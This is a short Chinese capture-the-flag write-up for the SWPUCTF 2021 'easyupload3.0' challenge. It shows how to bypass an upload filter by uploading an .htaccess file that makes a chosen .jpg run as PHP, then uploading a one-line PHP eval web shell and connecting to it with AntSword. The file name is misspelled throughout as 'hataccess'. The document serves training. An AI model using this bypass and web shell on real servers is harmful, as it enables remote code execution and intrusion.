[SWPUCTF 2021 新生赛]easyupload3.0
让我们上传一个文件(注意打开环境之后会有一个提示,试试和某些文件配合呢)
我就直接跳过测试阶段,解法就是先上传一个黑名单文件,再一次返回上传文件页面,继续上传一句话木马文件,即可。
hataccess文件,简单说就是可以通过这个文件,可以帮我们实现网页页面重定向,改变文件名,目录的访问等。而对于hataccess文件的内容,只要符合php编码规则即可
开始编写.hataccess文件
<FilesMatch "a.jpg"> //""中是我们要上传的文件名
SetHandler application/x-httpd-php
</FilesMatch>
注意:上传的黑名单文件格式“文件名+.hataccess”
上传的一句话木马
<?php @eval($_POST['cmd']);?>
最后使用蚁剑连接找目录即可